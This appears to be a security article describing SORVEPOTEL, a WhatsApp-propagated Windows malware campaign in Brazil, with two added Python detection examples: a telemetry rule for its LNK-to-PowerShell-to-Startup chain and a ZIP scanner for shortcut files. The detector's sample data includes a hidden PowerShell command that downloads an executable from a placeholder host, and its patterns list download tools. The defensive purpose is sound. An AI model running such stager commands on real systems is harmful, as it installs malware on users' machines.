Emerging Threat: SORVEPOTEL Malware Exploits WhatsApp for Rapid Self-Propagation

A new self-propagating malware, dubbed SORVEPOTEL, has been identified targeting Brazilian users by leveraging the popular messaging platform WhatsApp. This campaign, uncovered by Trend Micro researchers, utilizes the inherent trust associated with WhatsApp to disseminate itself across Windows systems. Unlike traditional malware that focuses on data theft or ransomware, SORVEPOTEL is engineered primarily for rapid spread and propagation.

Infection Mechanism

The attack initiates with a phishing message sent from an already compromised contact on WhatsApp, enhancing its credibility. This message includes a ZIP attachment disguised as a benign file, such as a receipt or a health-related document. Upon opening the attachment, the user encounters a Windows shortcut (LNK) file. Executing this file triggers a PowerShell script that downloads the main payload from an external server, for instance, sorvetenopoate[.]com.

Once the payload is executed, it establishes persistence on the host system by copying itself to the Windows Startup folder, ensuring it launches automatically upon system startup. Additionally, it runs a PowerShell command that communicates with a command-and-control (C2) server to receive further instructions or additional malicious components.
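The chain described in the two paragraphs above (a shortcut launched from the shell, a PowerShell one-liner that downloads the payload, and a copy dropped into the Startup folder) is narrow enough to detect from ordinary endpoint telemetry. The following is an added example, not Trend Micro's code and not the malware's: it runs two rules over constructed records reduced to a few fields, shaped loosely like Sysmon process-creation and file-creation events, and then correlates hosts on which both fired. Every host name, path, URL and command line in it is constructed for illustration; the "explorer.exe parent" heuristic assumes the user opened the LNK from the file manager, which is how the page describes the infection.

```python
"""Detection logic for an LNK -> PowerShell download -> Startup-folder chain.

Added example; not vendor or malware code. Telemetry records are constructed
and only loosely modelled on Sysmon process-create (ID 1) and file-create
(ID 11) events.
"""
import re
from dataclasses import dataclass

# PowerShell download primitives commonly seen in one-line stagers.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)

# Per-user and all-users Startup folders share this path tail.
STARTUP_FOLDER = re.compile(
    r"\\microsoft\\windows\\start menu\\programs\\startup\\", re.IGNORECASE
)

POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


def _is_powershell(image: str) -> bool:
    return image.lower().endswith(POWERSHELL_IMAGES)


def check_process_event(ev: dict):
    """Rule 1: PowerShell launched directly by the shell (explorer.exe is the
    parent when a user double-clicks an LNK) with a download primitive in its
    command line. Returns a Finding or None."""
    if not _is_powershell(ev.get("image", "")):
        return None
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("command_line", "")
    if parent.endswith("\\explorer.exe") and DOWNLOAD_PRIMITIVES.search(cmd):
        return Finding("powershell_download_from_shell", ev["host"], cmd)
    return None


def check_file_event(ev: dict):
    """Rule 2: any file written into a Startup folder. Legitimate writes there
    are rare enough that each one deserves an analyst's look."""
    target = ev.get("target_filename", "")
    if STARTUP_FOLDER.search(target):
        return Finding("startup_folder_write", ev["host"],
                       f"{ev.get('image', '?')} wrote {target}")
    return None


def scan_events(events):
    """Run both rules over a list of telemetry records; return all findings."""
    findings = []
    for ev in events:
        if ev.get("type") == "process_create":
            f = check_process_event(ev)
        elif ev.get("type") == "file_create":
            f = check_file_event(ev)
        else:
            f = None
        if f:
            findings.append(f)
    return findings


def correlate_hosts(findings):
    """Hosts on which both rules fired: the stager ran and persistence was set,
    which matches the described chain far better than either rule alone."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.rule)
    chain = {"powershell_download_from_shell", "startup_folder_write"}
    return {h for h, rules in by_host.items() if chain <= rules}


# Constructed sample telemetry: one infected workstation (WS-01) plus noise.
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS-01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -w hidden -ep bypass -c "iwr http://stager.example.invalid/p -OutFile $env:TEMP\s.exe"'},
    {"type": "process_create", "host": "WS-01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe Get-Date"},
    {"type": "file_create", "host": "WS-01",
     "image": r"C:\Users\ana\AppData\Local\Temp\s.exe",
     "target_filename": r"C:\Users\ana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\s.exe"},
    {"type": "file_create", "host": "WS-02",
     "image": r"C:\Program Files\Vendor\setup.exe",
     "target_filename": r"C:\Users\joao\Documents\report.docx"},
]

if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f.rule}] {f.host}: {f.detail}")
    print("hosts with the full chain:", correlate_hosts(found))
```

Rule 1 on its own will also catch administrators who genuinely download scripts from a desktop shortcut, so it is the per-host correlation with a Startup-folder write that turns two medium-confidence signals into something worth paging on.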

Propagation via WhatsApp Web

A distinctive feature of SORVEPOTEL is its exploitation of the WhatsApp Web interface for propagation. If the malware detects an active WhatsApp Web session on the infected system, it automatically sends the malicious ZIP file to all contacts and groups associated with the victim’s account. This automated dissemination results in a high volume of spam messages, often leading to account suspensions or bans due to violations of WhatsApp’s terms of service.

Geographical Impact

The majority of SORVEPOTEL infections have been reported in Brazil, with 457 out of 477 cases concentrated in the country. The affected sectors include government, public service, manufacturing, technology, education, and construction.

Distribution Channels

While WhatsApp serves as the primary vector for SORVEPOTEL’s spread, there is evidence suggesting that the operators behind this campaign have also utilized email to distribute the malicious ZIP files. These emails appear to originate from legitimate addresses, further enhancing their deceptive nature.

Mitigation Strategies

To protect against SORVEPOTEL and similar threats, users are advised to:

– Exercise Caution with Attachments: Avoid opening attachments from unknown or untrusted sources, even if they appear to come from known contacts.

– Verify Unexpected Messages: If you receive an unexpected message with an attachment, especially from a known contact, verify its authenticity through a different communication channel before opening it.

– Keep Software Updated: Regularly update your operating system and applications to patch known vulnerabilities.

– Use Security Software: Employ reputable antivirus and anti-malware solutions to detect and prevent infections.

– Monitor Account Activity: Regularly review your account activity for any unauthorized actions and report suspicious behavior to the platform’s support team.
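The first two recommendations above, together with the infection mechanism section, point to one mechanical control: the campaign's ZIP always carries a Windows shortcut dressed up as a receipt or health document, so a mail or chat gateway, or an endpoint hook, that refuses any archive containing a shortcut cuts the chain before the user is ever tempted. The following is an added example, not code from Trend Micro or from the campaign. It runs three checks on every entry of an in-memory ZIP: a `.lnk` extension, a double extension ending in a shortcut or script type, and the fixed 20-byte LNK header (HeaderSize 0x4C followed by the LinkCLSID) regardless of file name, so a renamed shortcut is still caught. The sample archive and its contents are constructed; no real sample is included.

```python
"""Pre-screening a ZIP attachment for Windows shortcut (LNK) entries.

Added example; not vendor or malware code. The archive is built in memory
from constructed contents.
"""
import io
import zipfile

# Every Windows shortcut begins with HeaderSize 0x0000004C (little-endian)
# followed by LinkCLSID {00021401-0000-0000-C000-000000000046}.
LNK_HEADER = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

DANGEROUS_EXTENSIONS = {
    "lnk", "exe", "scr", "bat", "cmd", "js", "jse", "vbs", "vbe", "hta", "ps1", "wsf",
}


def inspect_entry(name: str, head: bytes) -> list:
    """Return the reasons (possibly none) an archive entry looks like a
    shortcut or script dressed up as a document."""
    reasons = []
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext == "lnk":
        reasons.append("lnk extension")
    if len(parts) > 2 and ext in DANGEROUS_EXTENSIONS:
        reasons.append(f"double extension .{parts[-2]}.{ext}")
    if head.startswith(LNK_HEADER):
        reasons.append("LNK header magic")
    return reasons


def inspect_zip_bytes(data: bytes) -> list:
    """Inspect every file entry of a ZIP held in memory. Returns a list of
    {"name", "reasons"} dicts for the entries that tripped a check."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_HEADER))
            reasons = inspect_entry(info.filename, head)
            if reasons:
                flagged.append({"name": info.filename, "reasons": reasons})
    return flagged


def should_block(data: bytes) -> bool:
    """Policy helper: refuse the attachment if any entry was flagged."""
    return bool(inspect_zip_bytes(data))


def build_sample_zip() -> bytes:
    """Constructed test archive: a shortcut with a double extension, a benign
    PDF, and a shortcut renamed to look like an image."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("recibo.pdf.lnk", LNK_HEADER + b"\x00" * 64)
        zf.writestr("comprovante.pdf", b"%PDF-1.4\n% constructed benign content\n")
        zf.writestr("exame.jpg", LNK_HEADER + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip()
    for entry in inspect_zip_bytes(sample):
        print(f"{entry['name']}: {', '.join(entry['reasons'])}")
    print("block attachment:", should_block(sample))
```

Reading only the first 20 bytes of each entry keeps the check cheap even for large archives, and the magic-byte test is the one that matters: Windows chooses how to open a shortcut from its content, not from the extension the sender gave it.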

Conclusion

The SORVEPOTEL campaign underscores the evolving tactics of cybercriminals who exploit trusted communication platforms like WhatsApp to achieve rapid, large-scale malware propagation with minimal user interaction. By staying vigilant and adopting proactive security measures, users can mitigate the risks associated with such self-spreading malware.